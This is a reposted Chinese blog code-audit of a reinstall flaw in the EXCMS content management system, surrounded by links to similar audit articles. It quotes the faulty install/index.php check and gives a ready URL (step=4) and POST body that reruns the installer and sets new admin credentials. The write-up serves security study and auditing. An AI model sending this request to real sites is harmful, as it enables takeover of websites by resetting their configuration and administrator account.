Excms 重装漏洞

最新推荐文章于 2023-03-09 17:50:43 发布
最新推荐文章于 2023-03-09 17:50:43 发布
阅读量213 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/xsr7yer/p/9112047.html
版权

看了下乌云镜像标题里面‘爆任意文件’好奇下载此系统学习下,比较老的系统,安装完,并没有找到该文件:/apps/include.php

链接地址:http://wooyun.fbisb.com/bug_detail.php?wybug_id=wooyun-2011-03565

程序下载地址:http://www.mycodes.net/43/1073.htm

 

文件:/install/index.php

系统安装完并没有自动删除install目录。

安装完再次访问提示:

跟进代码76~86行:

$dirfile_params = array(
	'cache' => array('type' => 'dir', 'path' => './sitedata'),
	'config' => array('type' => 'file', 'path' => './sitedata/config.inc.php'),
); 

if(file_exists(EXCMS_ROOT . $dirfile_params['config']['path']) && $step < 4){
	exit("<title>EXCMS 警告</title>
		 <div style='font-size:12px;line-height:150%;'><font color='red' style='font-size:14px'>警告,您已经安装过EXCMS。</font><br/>
		为了保证您网站的数据安全,请立即手动删除 install/index.php 文件。<br/>
		如果您想重新安装 EXCMS,请先删除 {$dirfile_params['config']['path']} 文件,再次运行本安装文件。</font>");
}

  

存在逻辑判断错误问题代码:

EXCMS_ROOT . $dirfile_params['config']['path']) && $step < 4

 

检测/sitedata/config.inc.php文件存在、'&&'(和)$step小于4、代码才会执行exit()退出。

其中只需要有一个条件不满足即可绕过此的exit()、$step是可控变量。

 

这里构造重装语句:

Url:http://127.0.0.1/excms/install/index.php?step=4

 

Post: act=submit&checkrs=&dbhost=localhost&dbuser=root&dbpwd=root&dbname=excms&root=&rootpwd=&dbprefix=excms_&sitename=test%21&title=\'/'&domain=http%3A%2F%2F127.0.0.1%2Fexcms&idencryptcode=&adminuser=administrator&adminpwd=admin123&adminrepwd=admin123&createdb=0

 

转载于:https://www.cnblogs.com/xsr7yer/p/9112047.html

weixin_33835690
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
excms程序模板
05-23
6. **安全性**:由于excms提供源码,用户需要注意安全问题,如定期更新以修补安全漏洞,避免使用不安全的第三方插件,以及对敏感信息进行加密。 7. **数据库集成**:大多数CMS系统都依赖于数据库存储内容,excms...
EXCMS的详细介绍
07-15
本教程主要对EXCMS的相关信息进行了详细的介绍与说明,如:EXCMS的概括,EXCMS的优势与功能,以及EXCMS的使用教程。
系统漏洞
最新发布
qq_45301512的博客
03-09 4015
这里简单的说一下,前面的系统漏洞没什么好说的,跟zzcms差不多,主要是后面如何获取webshell,fengcms的源代码中存在如下图的一个写入配置文件的代码,也就是fopen那里,字母w意思就是以写入的方式打开文件,然后这里没过滤写入的参数,就会产生任意代码写入配置文件的漏洞。这段代码的意思就是如果post参数中存在step,那么step变量的值就等于post参数中step的值,如果post参数中不存在step,那么step变量的值就等于1。其实就在index.php文件上方的代码中。
PHP代码审计——系统漏洞(fengcms)
W小哥
08-07 1089
一、漏洞描述 在CMS安过程中,由于配置文件过滤不严,导致在安过程中可以插入配置文件恶意代码,从而执行任意命令,甚至直接获取Webshell 二、代码审计 查看安
PHP代码审计3—系统漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
06-26 919
PHP代码审计之系统漏洞入门
php之系统漏洞fengcms
qq_42307546的博客
05-30 345
项目地址 https://www.phpfans.net/xz/108401.html 一些php编写的网站在安完成之后会在install目录下生成一个类似于install.lock文件来判断网站是否已经安过了防止再次安,但是由于逻辑上的问题只是判断了文件是否存在并没有退出导致了而且有的时候在安过程中会把一些配置文件的信息通过post方式传输并保存在配置文件中如果没有对这些信息进行过滤我们就可以把恶意代码插进去 看一下安的代码 install/index.php define("TPL_IN
EXCMS2011 utf-8版本
05-19
EXCMS2011 utf-8版本是一款专为中文用户设计的内容管理系统,具有高度的稳定性和性能优化,尤其在处理千万级别的数据负载时表现出色。该系统采用UTF-8编码,确保了全球语言的兼容性,是搭建多语言网站的理想选择。在...
EXCMS教程详解
07-15
本教程通过图文结合的方式为大家讲解了EXCMS的详细步骤。
商业源码-编程源码-EXCMS 卓越内容管理系统 v1.3.3 UTF8.zip
06-15
EXCMS卓越内容管理系统是一款专为商业用途设计的开源软件,主要目标是提供高效、稳定且易用的内容管理解决方案。版本v1.3.3 UTF8是该系统的一个更新版本,支持UTF8编码,能处理多语言环境,尤其适用于全球化的网站...
EXCMS2011 v1.5 UTF-8.zip
07-06
EXCMS 是千万数据级,极速,人性化内容管理系统(PHP MYSQL),是中国内容容量数据级别最高(速度保证的情况下),内容HTML生成速度最快,软件人性化程度最高的内容管理系统,是高端用户(门户网站,大型企业网站以及政府网站)首选内容管理系统。EXCMS 是模块化设计系统,内置模块,插件管理,能够支持安用户自主开发的第三方模块和插件。 EXCMS 2011(v1.5) 2011.01.14 1、修改前台投稿上传图片BUG、以及内容中无法编辑 2、修改body字段中只有图片时无法显示的bug 3、修复uc无法连接成功 4、修复问答模块设置请求错误 5、修复更新URL缓存BUG 6、修复搜索中的高亮显示 7、修复桌面菜单下个人设置中修改密码错误 8、list_download.html模板{$cnt.thumb} 标签输出的内容错误
PHP代码审计之漏洞-Day2
ro4lsc的博客
03-10 7809
漏洞的种类 常见的漏洞的种类 1、自动删除这个安软件 通过生成一个lock文件来判断程序是否安过 2、根本无验证 安完成后不会自动删除文件,也不会生成lock判断是否安过 3、安file 直接用GET提交step绕过,直接进入下一步 4、变量覆盖导致 可以GET,POST,COOKIE任意提交一个变量名$insLockfile,从而让file_exists为fa...
漏洞练习-Day10】FengCms 1.32与Simple-Log1.6网站漏洞
PZ的博客
01-16 533
开始练习【红日团队】的PHP-Audit-Labs 代码审计 Day10 链接:https://github.com/hongriSec/PHP-Audit-Labs 感兴趣的同学可以去练习练习 预备知识: 内容题目均来自 PHP SECURITY CALENDAR 2017 Day 10 - Anticipation代码如下: extract($_POST); function goAway...
EXCMS疑似后门
weixin_34127717的博客
12-12 129
某天遇到Excms的系统,官网http://www.excms.cn/ 于GG搜索excms漏洞,发现分析是作者明显藏有后门的漏洞。 下载源码分析,很明显就能找到另一个疑似后门的漏洞(为什么说疑似?因为也不能确定,说不定就是有这样的程序员,呵呵。。) 漏洞文件: apps/include.php - 源码: //加载系统配置文件 - re...
审计espcms注入漏洞
qq_35420342的博客
04-07 1809
    正在学习代码审计,动手审计了一下seay在2013年发现的espcms注入漏洞,记录下来:    主要问题函数为interface/search.php中的in_taglist()函数:function in_taglist() { parent::start_pagetemplate(); include_once admin_ROOT . 'public/class_pageb...
dedecms漏洞
weixin_43778463的博客
11-06 841
dedecms漏洞漏洞版本v5.7
代码审计-1 开始审计前的准备&漏洞
xhscxj的博客
10-06 1327
很多PHP程序都是开源的、找到官网下载最新的源码包就好了(站长之家,A5源码)安网站在本地搭建网站,一边审计一边调试。实时跟踪各种动态变化浏览源码文件夹,了解该程序的大致目录入口文件index.php、admin.php文件一般是整个程序的入口,详细读一下index文件可以知道程序的架构、运行流程、包含那些配置文件,包含哪些过滤文件以及包含那些安全过滤文件,了解程序的业务逻辑一般类似config.php等文件,保存一些数据库相关信息、程序的一些信息。
通用网站系统漏洞及修复方法
浓缩精华 方成志 京华志
09-14 966
今天在测试渗透一网站时,旁注发现这套程序。版权未知。 问题很多,发出来大家了解下。 请勿非法入侵他人网站/系统,否则后果自负! 默认网站数据库: http://www.08.tv/data/nxnews.mdb (做为一个合格的站长,这个不用说怎么做了吧?)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值